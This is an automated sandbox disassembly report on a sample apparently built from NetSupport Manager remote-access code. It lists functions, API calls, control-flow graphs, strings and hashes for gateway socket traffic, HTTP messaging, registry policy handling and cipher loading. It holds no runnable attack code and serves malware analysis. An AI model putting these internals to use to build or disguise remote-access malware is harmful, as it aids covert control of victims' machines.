                                                                                      • timeGetTime.WINMM(?,00000000,?,6C5DD77B,00000000), ref: 6C5D6540
                                                                                      • Sleep.KERNEL32(00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D654B
                                                                                      • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6563
                                                                                      • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6574
                                                                                      • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D657D
                                                                                      • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D658E
                                                                                      • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D659E
                                                                                      • _memset.LIBCMT ref: 6C5D65C8
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,6C5DD77B,00000000), ref: 6C5D65D7
                                                                                      • LeaveCriticalSection.KERNEL32(6C61B898,?,00000000,?,6C5DD77B,00000000), ref: 6C5D65F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                      • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                      • API String ID: 3764039262-2631155478
                                                                                      • Opcode ID: f3d403a941c4984374258638dd86798888d02ad622736958829eb0afce58e01c
                                                                                      • Instruction ID: d350ec50ab228f9414e152a4c03de73e372ac209e7368118c740cc8463c9be9d
                                                                                      • Opcode Fuzzy Hash: f3d403a941c4984374258638dd86798888d02ad622736958829eb0afce58e01c
                                                                                      • Instruction Fuzzy Hash: 8F51BF71644300EFDB10EF6DCCC5B5A73B8AB89316F120915E906D7A81DB70E986CF69
                                                                                      Function 6C5D98D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2718 6c5d98d0-6c5d9932 2719 6c5d9934-6c5d9955 call 6c5d30a0 call 6c5f28e1 2718->2719 2720 6c5d9956-6c5d995e 2718->2720 2722 6c5d9ac5-6c5d9acc 2720->2722 2723 6c5d9964-6c5d9979 call 6c5f28f0 2720->2723 2724 6c5d9ace-6c5d9adb 2722->2724 2725 6c5d9b19-6c5d9b1d 2722->2725 2723->2722 2739 6c5d997f-6c5d9994 call 6c5f4330 2723->2739 2728 6c5d9add-6c5d9af6 wsprintfA 2724->2728 2729 6c5d9af8-6c5d9b07 wsprintfA 2724->2729 2730 6c5d9b1f-6c5d9b26 2725->2730 2731 6c5d9b4b-6c5d9b70 GetTickCount InterlockedExchange EnterCriticalSection 2725->2731 2734 6c5d9b0a-6c5d9b16 call 6c5d52b0 2728->2734 2729->2734 2730->2731 2735 6c5d9b28-6c5d9b41 call 6c5d77b0 2730->2735 2737 6c5d9b9c-6c5d9ba1 2731->2737 2738 6c5d9b72-6c5d9b9b LeaveCriticalSection call 6c5d30a0 call 6c5f28e1 2731->2738 2734->2725 2735->2731 2759 6c5d9b43-6c5d9b45 2735->2759 2740 6c5d9bfb-6c5d9c05 2737->2740 2741 6c5d9ba3-6c5d9bd0 call 6c5d4dd0 2737->2741 2739->2722 2754 6c5d999a-6c5d99af call 6c5f28f0 2739->2754 2749 6c5d9c3b-6c5d9c47 2740->2749 2750 6c5d9c07-6c5d9c17 2740->2750 2762 6c5d9d4b-6c5d9d6c LeaveCriticalSection call 6c5e77e0 2741->2762 2763 6c5d9bd6-6c5d9bf6 WSAGetLastError call 6c5d30a0 2741->2763 2755 6c5d9c50-6c5d9c5a 2749->2755 2757 6c5d9c19-6c5d9c1d 2750->2757 2758 6c5d9c20-6c5d9c22 2750->2758 2754->2722 2778 6c5d99b5-6c5d99f1 2754->2778 2766 6c5d9d2e-6c5d9d3b call 6c5d30a0 2755->2766 2767 6c5d9c60-6c5d9c65 2755->2767 2757->2758 2764 6c5d9c1f 2757->2764 2758->2749 2765 6c5d9c24-6c5d9c36 call 6c5d46c0 2758->2765 2759->2731 2786 6c5d9d6e-6c5d9d72 InterlockedIncrement 2762->2786 2787 6c5d9d78-6c5d9d8a call 6c5f28e1 2762->2787 2763->2762 2764->2758 2765->2749 2783 6c5d9d45 2766->2783 2768 6c5d9c67-6c5d9c6b 2767->2768 2769 6c5d9c71-6c5d9c9a send 2767->2769 2768->2766 2768->2769 2775 6c5d9c9c-6c5d9c9f 2769->2775 2776 6c5d9cf1-6c5d9d0f call 6c5d30a0 2769->2776 2781 6c5d9cbe-6c5d9cce WSAGetLastError 2775->2781 2782 6c5d9ca1-6c5d9cac 2775->2782 2776->2783 2784 6c5d99f7-6c5d99ff 2778->2784 2791 6c5d9d11-6c5d9d2c call 6c5d30a0 2781->2791 2792 6c5d9cd0-6c5d9ce9 timeGetTime Sleep 2781->2792 2782->2783 2788 6c5d9cb2-6c5d9cbc 2782->2788 2783->2762 2789 6c5d9a05-6c5d9a08 2784->2789 2790 6c5d9aa3-6c5d9ac2 call 6c5d30a0 2784->2790 2786->2787 2788->2792 2796 6c5d9a0e 2789->2796 2797 6c5d9a0a-6c5d9a0c 2789->2797 2790->2722 2791->2783 2792->2755 2795 6c5d9cef 2792->2795 2795->2783 2801 6c5d9a14-6c5d9a1d 2796->2801 2797->2801 2804 6c5d9a8d-6c5d9a8e 2801->2804 2805 6c5d9a1f-6c5d9a22 2801->2805 2804->2790 2806 6c5d9a24 2805->2806 2807 6c5d9a26-6c5d9a35 2805->2807 2806->2807 2808 6c5d9a37-6c5d9a3a 2807->2808 2809 6c5d9a90-6c5d9a93 2807->2809 2811 6c5d9a3c 2808->2811 2812 6c5d9a3e-6c5d9a4d 2808->2812 2810 6c5d9a9d 2809->2810 2810->2790 2811->2812 2813 6c5d9a4f-6c5d9a52 2812->2813 2814 6c5d9a95-6c5d9a98 2812->2814 2815 6c5d9a54 2813->2815 2816 6c5d9a56-6c5d9a65 2813->2816 2814->2810 2815->2816 2817 6c5d9a9a 2816->2817 2818 6c5d9a67-6c5d9a6a 2816->2818 2817->2810 2819 6c5d9a6c 2818->2819 2820 6c5d9a6e-6c5d9a85 2818->2820 2819->2820 2820->2784 2821 6c5d9a8b 2820->2821 2821->2790
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncmp
                                                                                      • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                      • API String ID: 909875538-2848211065
                                                                                      • Opcode ID: fb52e782a14474a73dab20392db70733aa14038a2242b7f7af2842cf1d96cfa5
                                                                                      • Instruction ID: dba97fcb907ed3845e0f623ca9bd7ef6d1fef07121cf68773d2a8783451612ab
                                                                                      • Opcode Fuzzy Hash: fb52e782a14474a73dab20392db70733aa14038a2242b7f7af2842cf1d96cfa5
                                                                                      • Instruction Fuzzy Hash: B7D12271A053199FDB20CF6CCCA1BD9B774AF4A308F0641D9D8099BA41DB31AD89CF89
                                                                                      Function 110285F0 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2822 110285f0-1102860d 2823 11028613-11028642 2822->2823 2824 11028cd8-11028cdf 2822->2824 2825 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2823->2825 2826 11028648-1102864e 2823->2826 2827 11028cf1-11028cf5 2824->2827 2828 11028ce1-11028cea 2824->2828 2842 1102871d 2825->2842 2832 11028650-11028658 2826->2832 2829 11028cf7-11028d09 call 11161d01 2827->2829 2830 11028d0a-11028d1e call 11161d01 2827->2830 2828->2827 2833 11028cec 2828->2833 2832->2832 2837 1102865a-11028660 2832->2837 2833->2827 2841 11028663-11028668 2837->2841 2841->2841 2843 1102866a-11028674 2841->2843 2844 11028720-1102872a 2842->2844 2845 11028691-11028697 2843->2845 2846 11028676-1102867d 2843->2846 2849 11028730-11028733 2844->2849 2850 11028ccf-11028cd7 2844->2850 2848 11028698-1102869e 2845->2848 2847 11028680-11028686 2846->2847 2847->2847 2851 11028688-1102868e 2847->2851 2848->2848 2852 110286a0-110286ce call 11163fed 2848->2852 2849->2850 2853 11028739-11028747 call 11026890 2849->2853 2850->2824 2851->2845 2852->2844 2858 11028c55-11028c6a call 11163db7 2853->2858 2859 1102874d-11028760 call 11162de7 2853->2859 2858->2850 2866 11028c70-11028cca 2858->2866 2864 11028762-11028765 2859->2864 2865 1102876b-11028793 call 11026700 call 11026890 2859->2865 2864->2858 2864->2865 2865->2858 2871 11028799-110287b6 call 11026980 call 11026890 2865->2871 2866->2850 2876 11028bc5-11028bcc 2871->2876 2877 110287bc 2871->2877 2879 11028bf2-11028bf9 2876->2879 2880 11028bce-11028bd1 2876->2880 2878 110287c0-110287e0 call 11026700 2877->2878 2890 110287e2-110287e5 2878->2890 2891 11028816-11028819 2878->2891 2883 11028c11-11028c18 2879->2883 2884 11028bfb-11028c01 2879->2884 2880->2879 2882 11028bd3-11028bda 2880->2882 2889 11028be0-11028bf0 2882->2889 2887 11028c1a-11028c25 2883->2887 2888 11028c28-11028c2f 2883->2888 2885 11028c07-11028c0f 2884->2885 2885->2883 2885->2885 2887->2888 2892 11028c31-11028c3b 2888->2892 2893 11028c3e-11028c45 2888->2893 2889->2879 2889->2889 2894 110287e7-110287ee 2890->2894 2895 110287fe-11028801 2890->2895 2897 11028bae-11028bbf call 11026890 2891->2897 2898 1102881f-11028832 call 11164150 2891->2898 2892->2893 2893->2858 2896 11028c47-11028c52 2893->2896 2899 110287f4-110287fc 2894->2899 2895->2897 2900 11028807-11028811 2895->2900 2896->2858 2897->2876 2897->2878 2898->2897 2905 11028838-11028854 call 111646ce 2898->2905 2899->2895 2899->2899 2900->2897 2908 11028856-1102885c 2905->2908 2909 1102886f-11028885 call 111646ce 2905->2909 2910 11028860-11028868 2908->2910 2914 11028887-1102888d 2909->2914 2915 1102889f-110288b5 call 111646ce 2909->2915 2910->2910 2912 1102886a 2910->2912 2912->2897 2916 11028890-11028898 2914->2916 2920 110288b7-110288bd 2915->2920 2921 110288cf-110288e5 call 111646ce 2915->2921 2916->2916 2918 1102889a 2916->2918 2918->2897 2922 110288c0-110288c8 2920->2922 2926 110288e7-110288ed 2921->2926 2927 110288ff-11028915 call 111646ce 2921->2927 2922->2922 2925 110288ca 2922->2925 2925->2897 2928 110288f0-110288f8 2926->2928 2932 11028917-1102891d 2927->2932 2933 1102892f-11028945 call 111646ce 2927->2933 2928->2928 2930 110288fa 2928->2930 2930->2897 2934 11028920-11028928 2932->2934 2938 11028947-1102894d 2933->2938 2939 1102895f-11028975 call 111646ce 2933->2939 2934->2934 2936 1102892a 2934->2936 2936->2897 2941 11028950-11028958 2938->2941 2944 11028977-1102897d 2939->2944 2945 1102898f-110289a5 call 111646ce 2939->2945 2941->2941 2943 1102895a 2941->2943 2943->2897 2946 11028980-11028988 2944->2946 2950 110289a7-110289ad 2945->2950 2951 110289bf-110289d5 call 111646ce 2945->2951 2946->2946 2948 1102898a 2946->2948 2948->2897 2952 110289b0-110289b8 2950->2952 2956 110289d7-110289dd 2951->2956 2957 110289ef-11028a05 call 111646ce 2951->2957 2952->2952 2954 110289ba 2952->2954 2954->2897 2958 110289e0-110289e8 2956->2958 2962 11028a07-11028a0d 2957->2962 2963 11028a1f-11028a35 call 111646ce 2957->2963 2958->2958 2960 110289ea 2958->2960 2960->2897 2964 11028a10-11028a18 2962->2964 2968 11028a37-11028a3d 2963->2968 2969 11028a4f-11028a65 call 111646ce 2963->2969 2964->2964 2966 11028a1a 2964->2966 2966->2897 2970 11028a40-11028a48 2968->2970 2974 11028a86-11028a9c call 111646ce 2969->2974 2975 11028a67-11028a6d 2969->2975 2970->2970 2973 11028a4a 2970->2973 2973->2897 2980 11028ab3-11028ac9 call 111646ce 2974->2980 2981 11028a9e 2974->2981 2976 11028a77-11028a7f 2975->2976 2976->2976 2978 11028a81 2976->2978 2978->2897 2986 11028ae0-11028af6 call 111646ce 2980->2986 2987 11028acb 2980->2987 2982 11028aa4-11028aac 2981->2982 2982->2982 2984 11028aae 2982->2984 2984->2897 2992 11028b17-11028b2d call 111646ce 2986->2992 2993 11028af8-11028afe 2986->2993 2989 11028ad1-11028ad9 2987->2989 2989->2989 2991 11028adb 2989->2991 2991->2897 2998 11028b4f-11028b65 call 111646ce 2992->2998 2999 11028b2f-11028b3f 2992->2999 2994 11028b08-11028b10 2993->2994 2994->2994 2996 11028b12 2994->2996 2996->2897 3004 11028b67-11028b6d 2998->3004 3005 11028b7c-11028b92 call 111646ce 2998->3005 3000 11028b40-11028b48 2999->3000 3000->3000 3002 11028b4a 3000->3002 3002->2897 3006 11028b70-11028b78 3004->3006 3005->2897 3010 11028b94-11028b9a 3005->3010 3006->3006 3008 11028b7a 3006->3008 3008->2897 3011 11028ba4-11028bac 3010->3011 3011->2897 3011->3011
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6FBE1370,?,0000001A), ref: 110286DD
                                                                                      • _strrchr.LIBCMT ref: 110286EC
                                                                                        • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileModuleName__stricmp_l_strrchr
                                                                                      • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                      • API String ID: 1609618855-357498123
                                                                                      • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                      • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                      • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                      • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                      Function 6C5E6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6BD5
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6C26
                                                                                      • Sleep.KERNEL32(00000064), ref: 6C5E6C5B
                                                                                        • Part of subcall function 6C5E6940: GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                      • WaitForSingleObject.KERNEL32(0000031C,?), ref: 6C5E6C7C
                                                                                      • _memmove.LIBCMT ref: 6C5E6C93
                                                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C5E6CB4
                                                                                      • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C5E6CD9
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6CEC
                                                                                      • _calloc.LIBCMT ref: 6C5E6D76
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6DF3
                                                                                      • InterlockedExchange.KERNEL32(02853072,00000000), ref: 6C5E6E01
                                                                                      • _calloc.LIBCMT ref: 6C5E6E33
                                                                                      • _memmove.LIBCMT ref: 6C5E6E47
                                                                                      • InterlockedDecrement.KERNEL32(0285301A), ref: 6C5E6EC3
                                                                                      • SetEvent.KERNEL32(00000318), ref: 6C5E6ECF
                                                                                      • _memmove.LIBCMT ref: 6C5E6EF4
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6F4F
                                                                                      • InterlockedExchange.KERNEL32(02852FBA,-6C61A188), ref: 6C5E6F60
                                                                                      Strings
                                                                                      • ReadMessage returned FALSE. Terminating connection, xrefs: 6C5E6F3A
                                                                                      • FALSE, xrefs: 6C5E6E67
                                                                                      • ResumeTimeout, xrefs: 6C5E6BBA
                                                                                      • ProcessMessage returned FALSE. Terminating connection, xrefs: 6C5E6F25
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5E6E62
                                                                                      • httprecv, xrefs: 6C5E6BDD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                      • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                      • API String ID: 1449423504-919941520
                                                                                      • Opcode ID: 3364a4fd5ee0db7c7927f711757876820ead3de70ba1b450b830d21f000c2d0e
                                                                                      • Instruction ID: adf0c25f8261296612d28c6f0cec855ec173c374a3f15780385c7ff393ddaeb6
                                                                                      • Opcode Fuzzy Hash: 3364a4fd5ee0db7c7927f711757876820ead3de70ba1b450b830d21f000c2d0e
                                                                                      • Instruction Fuzzy Hash: F9B1C1B1D00258DFDF20DB69CD85BDA73B4EB4834AF00449AE649E7A40DBB49AC4CF95
                                                                                      Function 11086700 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                      • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                      • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                      • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                      • API String ID: 2201880244-3035937465
                                                                                      • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                      • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                      • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                      • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                      Function 11141890 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 3535843008-2062829784
                                                                                      • Opcode ID: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                      • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                      • Opcode Fuzzy Hash: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                      • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                      Function 11074A00 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                      • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                      • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                      • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                      • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                      • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                      • _strncpy.LIBCMT ref: 11074B68
